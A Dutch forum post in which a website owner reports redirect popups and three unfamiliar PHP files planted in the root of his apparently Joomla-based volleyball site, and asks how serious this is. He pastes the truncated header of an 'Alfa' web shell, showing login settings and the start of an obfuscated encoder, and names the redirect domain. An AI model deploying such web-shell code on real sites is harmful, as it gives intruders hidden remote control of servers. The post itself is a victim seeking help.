Hallo,
Ik heb een keer iets dergelijks gehad bij de volleybalsite, Leen heeft mij toen uitstekend geholpen, maar sinds deze week krijg ik opeens weer zo'n reclame pagina popup mee als ik naar de
volleybalsitevolleybalsite
ga. Nu zie ik in de root opeens daar bestanden staan die ik nog nooit heb zien staan:
- contacts.php
- pagenews.php
- userloader.php
De code die erin zit lijkt overeen te komen met wat er destijds in zat, echter nu kon ik wel de akeeba backup op mijn localhost terug zetten wat destijds niet lukte.
Hierbij een stukje van de code:
<?php
$GLOBALS['Alfa_User'] = 'admin';
$GLOBALS['Alfa_Pass'] = '8a4bf282852bf4c49e17f0951f645e72';
$GLOBALS['Alfa_Protect_Shell'] = '1';
$GLOBALS['Alfa_Login_Page'] = '404';
$GLOBALS['Alfa_Show_Icons'] = '1';
if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;$b64='ABCDEF
De site die elke keer geopend werd was van "//babybabybabyoooh.net/security".
Hoe ernstig is dit? Ik kan dit niet goed inschatten? Is het nog onschuldig, enkel rotzooi heb je ervan?
Wat ik mij nu af vraag, waar komt dit van daan? Hoe is het gelukt om die bestanden daar te plaatsen? Moet ik naar mijn provider gaan?
Ik heb de site afgelopen week naar 3.8.1 gebracht.
Bedankt,
Nico